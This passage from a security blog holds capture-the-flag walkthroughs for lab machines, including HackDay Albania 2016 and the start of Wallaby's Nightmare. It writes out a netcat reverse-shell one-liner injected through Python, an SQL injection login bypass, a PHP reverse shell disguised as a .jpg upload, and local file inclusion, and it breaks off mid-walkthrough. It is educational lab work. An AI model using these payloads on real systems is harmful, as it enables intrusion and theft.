<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAW8S6482CxJdKjFunhKtUl0pLTdP9pOHyQYscI9wGMeHV5_M3iOZv8cs5ceD8CqsZDGA1i4aYtIR3W-vMUdZaTWiNGDbpcN2gkRkJj1p_jKLAB1smSxu4jB-JJQfH_S2Eb7p4fjR-JLU/s1600/10000.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAW8S6482CxJdKjFunhKtUl0pLTdP9pOHyQYscI9wGMeHV5_M3iOZv8cs5ceD8CqsZDGA1i4aYtIR3W-vMUdZaTWiNGDbpcN2gkRkJj1p_jKLAB1smSxu4jB-JJQfH_S2Eb7p4fjR-JLU/s400/10000.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Hmmm, maybe we should try play with it via <b>netcat?</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIes0UAUIZUBAQn_YKAOt5DGjNMxNRxePSYNmNtPk_5CkY2BHbmY4uiguQh6VBE0S6miNjhBtr-eBINqd0tmQeCNmS_eOphiGkRZipdzRSPhP3QLcWwDLwSPpcZ3t97C4uUPdw5Bo9UEQ/s1600/nc.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="83" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIes0UAUIZUBAQn_YKAOt5DGjNMxNRxePSYNmNtPk_5CkY2BHbmY4uiguQh6VBE0S6miNjhBtr-eBINqd0tmQeCNmS_eOphiGkRZipdzRSPhP3QLcWwDLwSPpcZ3t97C4uUPdw5Bo9UEQ/s400/nc.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
Probably on port 10000 is something like a <b>ping -c [number of packets] 127.0.0.1</b>.<br />
<br />
Maybe we will be able to inject some command to obtain reverse shell.<br />
Do to that, we have to <b>import os.system</b>, so let's do that!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCAxjERMXkhOyIB2mmVqtUMPf8twHttwHjNSln6bVi4tpe3DPkw5hK04jtMEkqb_D9TU2ivm-obXmfJJ6JT7zEtkmWJa-O2YtM9oTHJIaJ7_sMp8wcO8YC82Q6mUuul5ErniWXvOPHK0M/s1600/shell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCAxjERMXkhOyIB2mmVqtUMPf8twHttwHjNSln6bVi4tpe3DPkw5hK04jtMEkqb_D9TU2ivm-obXmfJJ6JT7zEtkmWJa-O2YtM9oTHJIaJ7_sMp8wcO8YC82Q6mUuul5ErniWXvOPHK0M/s640/shell.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
Very good, we executed <b>id </b>command on victim's OS.<br />
<br />
We are able to obtain reverse shell using <b>__import__('os').system('nc -nv 192.168.56.1 53 -e /bin/sh')</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9fgEIYJbShX5kAgtEagD3wCy7NehwMQgY2sxVgPrAVL5xgdDw3IRSjjxvzJGCh1Bu9AlJDZty457OYRc0SpleeTX7fJKLwXarBcOy9saYTKKV_ZaI9YO2IgSg9COtpxNyfnjVV-0nrFI/s1600/rev.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="89" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9fgEIYJbShX5kAgtEagD3wCy7NehwMQgY2sxVgPrAVL5xgdDw3IRSjjxvzJGCh1Bu9AlJDZty457OYRc0SpleeTX7fJKLwXarBcOy9saYTKKV_ZaI9YO2IgSg9COtpxNyfnjVV-0nrFI/s640/rev.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! We have got limited shell.<br />
<blockquote class="tr_bq">
<b>jack@basement:~$ ls<br />ls<br />flag.txt ping.py run_ping.sh<br />jack@basement:~$ cat flag.txt<br />cat flag.txt<br />flag{j4cks_t0t4L_l4cK_0f_$uRpr1sE}</b></blockquote>
Good :)<br />
<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-89948774391713997672017-01-13T10:48:00.002+01:002017-02-01T15:02:54.773+01:00HackDay Albania 2016Hello,<br />
<br />
Description<br />
This was used in HackDay Albania's 2016 CTF.<br />
<br />
Scanning phase<br />
Our <b>nmap</b> scanning show us, that our target has assigned <b>192.168.56.101</b> address.<br />
<br />
So, looking at the host deeper, we can see that there are couple open ports.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_yZbcX6P2wZZTSujikw82eP5cvaxLq827wEdWRKPPTu7sbupwBoQdAO1AHsOJU_GXbjhZaIBQvH6PXQIKJU13vWA5NezNlzSYoKpO1C42JIRqwuZp8FFn0UTk_GzOlWqz8ZiDJGQMIsw/s1600/namp1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_yZbcX6P2wZZTSujikw82eP5cvaxLq827wEdWRKPPTu7sbupwBoQdAO1AHsOJU_GXbjhZaIBQvH6PXQIKJU13vWA5NezNlzSYoKpO1C42JIRqwuZp8FFn0UTk_GzOlWqz8ZiDJGQMIsw/s640/namp1.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Good, let's begin our penetration test from <b>8008</b> port.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg15qxxIpKk-XO074ZSn86xlHDflTI3BZ7j7T0u182dz4Gr9EpPSuB54O7fuhIVVU0BEeQgn8Nb0DbxyZKe1f7IM_ERD0AIoFWgrOg0lZwsOj8fQY6ld1tg5n1xOGXm3WjIrdXE-WbZ7oQ/s1600/web1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg15qxxIpKk-XO074ZSn86xlHDflTI3BZ7j7T0u182dz4Gr9EpPSuB54O7fuhIVVU0BEeQgn8Nb0DbxyZKe1f7IM_ERD0AIoFWgrOg0lZwsOj8fQY6ld1tg5n1xOGXm3WjIrdXE-WbZ7oQ/s400/web1.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Nice picture. Let's look at <b>robots.txt</b> file<br />
<blockquote class="tr_bq">
<pre>Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/</pre>
</blockquote>
Good, let's add this path to some kind of dictionary and run Dirbuster.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW8QYwNVlPw7HgZHOFmSMCDUXNouKQj8sPwQL931iml4HQmJ1FehzjFwcjbxgbZtSR_HOcAqWUUOjcXrNvKrrk2d2SAan4DHxGVVx1YDUqbBtTCzSTlgIZdO0o9HRl7fnLqj1gGA42yks/s1600/dirbus.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW8QYwNVlPw7HgZHOFmSMCDUXNouKQj8sPwQL931iml4HQmJ1FehzjFwcjbxgbZtSR_HOcAqWUUOjcXrNvKrrk2d2SAan4DHxGVVx1YDUqbBtTCzSTlgIZdO0o9HRl7fnLqj1gGA42yks/s640/dirbus.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Hmmm, <b>/unisxcudkqjydw/ </b>has smaller size of response than other. So, let's look at this path deeper.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwzSO6WDE0Erlb31DcDRns3OGUEZR9ovprhccb1fo8sD_jcniP-lU47feqj3nEdZAghmJx5FwUzxY7WP5Ulja2ALW5V70NW_DoiHmEPDSWJeBYaoBzyk2zjfJa5YH1qlpjMO41dYFwdZI/s1600/vuln.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwzSO6WDE0Erlb31DcDRns3OGUEZR9ovprhccb1fo8sD_jcniP-lU47feqj3nEdZAghmJx5FwUzxY7WP5Ulja2ALW5V70NW_DoiHmEPDSWJeBYaoBzyk2zjfJa5YH1qlpjMO41dYFwdZI/s320/vuln.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, let's examine <b>/vulnbank/</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD0niWaX3gNmK1BIMJ1l4ozsC5JdNuFtfgPcbonmrWmceAWklAvdulfpkGgQvj13lS39FMVbB0NguFFYamOS_86mAuD9pyFxAHaACYp30VKAxKJEtYD_gXEbCzKelBoDeY1DMXbHTH7QA/s1600/vulnank.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD0niWaX3gNmK1BIMJ1l4ozsC5JdNuFtfgPcbonmrWmceAWklAvdulfpkGgQvj13lS39FMVbB0NguFFYamOS_86mAuD9pyFxAHaACYp30VKAxKJEtYD_gXEbCzKelBoDeY1DMXbHTH7QA/s400/vulnank.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! Clicking on <b>client/</b> directory<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSSt7aXZDMLIgvqnHD4MqXCkY9Pv-eW1DFve_hQ3KPpsswqnJerqQ8zeQKa8BJWJRQjX_UEc3WbrqZq1uVaDOs1GB8m9rfkzF2n1U9CQe0xtYVvOm30hsVzmHlitWvlghCRiJYeHw819I/s1600/client.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSSt7aXZDMLIgvqnHD4MqXCkY9Pv-eW1DFve_hQ3KPpsswqnJerqQ8zeQKa8BJWJRQjX_UEc3WbrqZq1uVaDOs1GB8m9rfkzF2n1U9CQe0xtYVvOm30hsVzmHlitWvlghCRiJYeHw819I/s320/client.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! But we don't know valid credentials. Unfortunately default credentials doesn't work... Let's try SQL Injection technique.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZkC3sgNIWwAul0ldPqvQcZNBKhEsX_OLUR4EMbjoGJyX1S6nAGnokEUhi0CMlzsU1-UvSHe8tYlzI1YQmR67izC_Eb3AAUiuTjc95FYtICJMk6fom-vzO0o3Gd847zFP9yeJxXDnWEN0/s1600/sqli.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZkC3sgNIWwAul0ldPqvQcZNBKhEsX_OLUR4EMbjoGJyX1S6nAGnokEUhi0CMlzsU1-UvSHe8tYlzI1YQmR67izC_Eb3AAUiuTjc95FYtICJMk6fom-vzO0o3Gd847zFP9yeJxXDnWEN0/s400/sqli.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
And indeed, very interesting, isn't it? Trying <b>admin' || 1=1 #</b> and password abcd, we are logged in!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfxO8wzT0FGTLO5F1ytgE5pqEciI1xlQ0QARyBuSmVMUEFwvmvgyLp9CyaPhGAbgXhDF0rMqPLcxW5ld9FCPkEunqhbx0h_QS_65MKaKsG00lzAVs8L7WL04N0y9BmQMFM31jVnTzgY6U/s1600/admin.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfxO8wzT0FGTLO5F1ytgE5pqEciI1xlQ0QARyBuSmVMUEFwvmvgyLp9CyaPhGAbgXhDF0rMqPLcxW5ld9FCPkEunqhbx0h_QS_65MKaKsG00lzAVs8L7WL04N0y9BmQMFM31jVnTzgY6U/s400/admin.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent, we are able to upload some file using Browse button.<br />
I tried upload <b>*.php</b> file, but I have got message that the application allows only picture extensions such as <b>*.jpeg, *.jpg</b>, etc...<br />
So, let's change extension of our PHP reverse shell from <b>*.php</b> to <b>*.jpg</b>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt8Xkb-vg-vEnv5PvPJN3cYXsJFHRESuIIoQQeLfnL79744zJ8aXdkaAJ-GTqxsxlMnaHNoTwXHjD7dQ9zpF0WnYt5sP8YqRY7FIhXvcd7XkvfVydsQgwj7LZhG7YCTj7TYMPstwDPAlM/s1600/reverse.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt8Xkb-vg-vEnv5PvPJN3cYXsJFHRESuIIoQQeLfnL79744zJ8aXdkaAJ-GTqxsxlMnaHNoTwXHjD7dQ9zpF0WnYt5sP8YqRY7FIhXvcd7XkvfVydsQgwj7LZhG7YCTj7TYMPstwDPAlM/s640/reverse.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Using <b>python3.5 -c "import pty;pty.spawn('/bin/bash')" </b>we can spawn shell.<br />
Looking at <b>config.php</b> we can find<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fPMFeOFzfkWk90t7tdo431GBf2FkJR9T2anXaIWkmXUfz9XHy_RZV4GiVTkYV0XKXdSd22zqMIzjWZkRjhaE42VNzoyfgoZxwV6PcyN4wJuhUzqIrFFG3q7qXW5x7xNybqii1FaRqbw/s1600/mysql.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fPMFeOFzfkWk90t7tdo431GBf2FkJR9T2anXaIWkmXUfz9XHy_RZV4GiVTkYV0XKXdSd22zqMIzjWZkRjhaE42VNzoyfgoZxwV6PcyN4wJuhUzqIrFFG3q7qXW5x7xNybqii1FaRqbw/s400/mysql.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Unfortunately databases don't have useful passwords for us.<br />
Looking at /etc/passwd, we can see useful information<br />
<blockquote class="tr_bq">
-rw-r--rw- 1 root root 1623 Oct 22 17:21 /etc/passwd</blockquote>
Good, we are able to edit <b>passwd</b> file. So, we are able to add certain user with known password with root privileges.<br />
<br />
<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-58770918395920849402017-01-12T10:55:00.000+01:002017-02-01T15:03:44.807+01:00Wallaby's: Nightmare (1.0.2)Hi,<br />
<br />
Today I want to present Wallaby's: Nightmare (1.0.2) walkthrough.<br />
<br />
Scanning phase<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8G2y0lvMvI1Ep_kXvAv9RfnBZ47kxp8Q42HRWVtulUn6R9x80ulBU_c1rSKbwuIGFagwZmws-CH64Q01PLDApYArol_2-bK7ATLHtRPiuzO4vmpW6tLIlAAD1vLp6BBPA7RwIAIBjToM/s1600/nmap_sn.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="143" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8G2y0lvMvI1Ep_kXvAv9RfnBZ47kxp8Q42HRWVtulUn6R9x80ulBU_c1rSKbwuIGFagwZmws-CH64Q01PLDApYArol_2-bK7ATLHtRPiuzO4vmpW6tLIlAAD1vLp6BBPA7RwIAIBjToM/s400/nmap_sn.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Good, we know that our target has assigned IP 1921.68.56.100 or 192.168.56.101.<br />
Let's try investigate .101 deeper using nmap scanner with <b>-p- -sV</b> options.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhROh9z1ipEhBwrFm1QLI0p8o8iLe1dMrjwbaECHrNyDTkl1v-2XFqT7UrmKWGI1zbdzZbsZsY39kT-BNGTrh4wKW6xz1lfG4yCd7wq0Nz8Zp9jvrNo6xkEa4Akrwu29wb9CCN6nUZhv-A/s1600/nmap-p-sV-v.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="85" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhROh9z1ipEhBwrFm1QLI0p8o8iLe1dMrjwbaECHrNyDTkl1v-2XFqT7UrmKWGI1zbdzZbsZsY39kT-BNGTrh4wKW6xz1lfG4yCd7wq0Nz8Zp9jvrNo6xkEa4Akrwu29wb9CCN6nUZhv-A/s400/nmap-p-sV-v.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
Great, the result provided us to very juicy information such as open ports and version of services which are hosted on it.<br />
<br />
Let's begin our penetration test for web application.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiavrYBOp43qg9c73o0NuJBJMq7B4blnWqpXtAQeFms3ju4t1CNAwMWzTH9SByMwlwsBB8C5oY_HqwevVxb-a_Fz-sfwmSQjMnYmRDWD8AVppa4Z9izIecJt-pIJmftuB2XAKVG_1bpkaQ/s1600/web_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiavrYBOp43qg9c73o0NuJBJMq7B4blnWqpXtAQeFms3ju4t1CNAwMWzTH9SByMwlwsBB8C5oY_HqwevVxb-a_Fz-sfwmSQjMnYmRDWD8AVppa4Z9izIecJt-pIJmftuB2XAKVG_1bpkaQ/s320/web_1.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Interesting, isn't it? Let's try use <b>test</b> username.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2YWSNFHTCq5FYRkNEeEpDQSbvgR1WP3saOj7F900Yr4GxSV5MbyTuuEhOHMbCzv7xQjfWhaLV9Vcq1WNxnj1oSCqQ36kApbeS2QJw-VefrxcfIsvyNfU3e5c4-lq0-Dv-_P94-6Fy-Io/s1600/web_2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2YWSNFHTCq5FYRkNEeEpDQSbvgR1WP3saOj7F900Yr4GxSV5MbyTuuEhOHMbCzv7xQjfWhaLV9Vcq1WNxnj1oSCqQ36kApbeS2QJw-VefrxcfIsvyNfU3e5c4-lq0-Dv-_P94-6Fy-Io/s400/web_2.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Our username is used in the application, hmmm. Clicking on "<b>Start the CTF!</b>" we are redirected to certain page<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6CuJrvC_SfCFvVx2ao5o6H87SYvNmk6bQjNu5DNFbPeCFmQAvyNT0K24PtGMTDGVcuVjUIgNLDhFVvkaTMNQd0nSrq-9wNHHEDvgaYf4Z71xc3pVlNKoN2jpY5S7z5j3JuW2TyA41YL4/s1600/web_3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6CuJrvC_SfCFvVx2ao5o6H87SYvNmk6bQjNu5DNFbPeCFmQAvyNT0K24PtGMTDGVcuVjUIgNLDhFVvkaTMNQd0nSrq-9wNHHEDvgaYf4Z71xc3pVlNKoN2jpY5S7z5j3JuW2TyA41YL4/s640/web_3.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Nothing interesting? Let's look at the URL, we can utilize <b>page</b> parameter to try LFI or RFI.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlqA5fhNzUneXX6e9IPo_7DgJmJL890oeMtOmH4X8wWMqQetk4DDwF42uHCf9U7AR6he4vrjkpdD9Rh1ZlVb-AV0lNGb1CuWcJGZsyYEZPba5t4MWeSakJVtzj2NvC4atShbHWek5jzxw/s1600/web_etc_passwd.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlqA5fhNzUneXX6e9IPo_7DgJmJL890oeMtOmH4X8wWMqQetk4DDwF42uHCf9U7AR6he4vrjkpdD9Rh1ZlVb-AV0lNGb1CuWcJGZsyYEZPba5t4MWeSakJVtzj2NvC4atShbHWek5jzxw/s640/web_etc_passwd.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Bingo! This parameter is vulnerable to LFI! But unfortunately after this action I have got...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnES8Lb9DTgmisQ0wrjF0T_TCpdR6fkt5LV_1lczw45vEPA1G7ExzrzZJ0XVzkhWV1RVdiLbVSayMJEVjAxW2W4RsmiYxbSt8eCunVEJAI4TG0xWh0xKRWR9ItgFGRIH3DRmunCqpcaOs/s1600/web_dupa.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnES8Lb9DTgmisQ0wrjF0T_TCpdR6fkt5LV_1lczw45vEPA1G7ExzrzZJ0XVzkhWV1RVdiLbVSayMJEVjAxW2W4RsmiYxbSt8eCunVEJAI4TG0xWh0xKRWR9ItgFGRIH3DRmunCqpcaOs/s320/web_dupa.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
It's not issue with my network connection :-( I am confused, so let's try use nmap again.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAGYj6LMhdlg13AxPdHD2sMNkv983qcIBzkiSyi7ci3Mev2xQ9jPwrCuKT8e6FqwWkruFfal2gf5CmR5aQNGDJP-DRB9O-4RGEbNiDf1LC95x89pzgKG3Yuup0EKTBXB2kkdI8WVjRKXM/s1600/nmap_2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="81" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAGYj6LMhdlg13AxPdHD2sMNkv983qcIBzkiSyi7ci3Mev2xQ9jPwrCuKT8e6FqwWkruFfal2gf5CmR5aQNGDJP-DRB9O-4RGEbNiDf1LC95x89pzgKG3Yuup0EKTBXB2kkdI8WVjRKXM/s400/nmap_2.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
Wow! port 80 is not open, but we can see that new port has been opened - <b>60080!</b> Let's investigate this port!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO6TNIc_oAXpFaEZmsHzGJQjgh489H7bbUGAbtBfamcR6wl_9YB_t2RAARz7i3VWYdzcseTY_dKcogrmsSAeKIIp4FrG8kAkbmT1HJBGtJwjwIKfmLq6hmg6gqj8aBe_r-a6IM5fWMkcM/s1600/web_21.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO6TNIc_oAXpFaEZmsHzGJQjgh489H7bbUGAbtBfamcR6wl_9YB_t2RAARz7i3VWYdzcseTY_dKcogrmsSAeKIIp4FrG8kAkbmT1HJBGtJwjwIKfmLq6hmg6gqj8aBe_r-a6IM5fWMkcM/s320/web_21.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Looking for some useful URL's I tried this URL address which I know<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-sKPFmZ0r10GQIiyWvdatj9r-sunZFeY7NRo02C6JjgdiUlg0T-aHiJlyrfm_xbqik51Yafw0D3Y6jiuz6S66jXoT2VoRU1xCNitENKbUTQ34d-yukMZOgp-QXe5hFUQ4h33PUtHCrrQ/s1600/lfi2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-sKPFmZ0r10GQIiyWvdatj9r-sunZFeY7NRo02C6JjgdiUlg0T-aHiJlyrfm_xbqik51Yafw0D3Y6jiuz6S66jXoT2VoRU1xCNitENKbUTQ34d-yukMZOgp-QXe5hFUQ4h33PUtHCrrQ/s640/lfi2.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Bingo! There is also LFI vulnerability! Trying read <b>/etc/shadow</b> I haven;t got result.<br />
I spent a lot of time on searching method or files which I will be able to display, I guessed <b>mailer</b> file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7xJyCVKG6X3WZRLFPXHBlWIkX9mR1OoQwiqlp6jUBN2r-Z08MUzDCqBN4yjebhY5rVNoklF-NanpVBF1Wh4ysRTjTbDO5EChUrJu28o7nDnF9vbHkgDB01wB12y-EY2mRlHGvsfqAdTc/s1600/mailer.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7xJyCVKG6X3WZRLFPXHBlWIkX9mR1OoQwiqlp6jUBN2r-Z08MUzDCqBN4yjebhY5rVNoklF-NanpVBF1Wh4ysRTjTbDO5EChUrJu28o7nDnF9vbHkgDB01wB12y-EY2mRlHGvsfqAdTc/s320/mailer.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Interesting, let's look at source code<br />
<div class="separator" style="clear: both; text-align: center;">
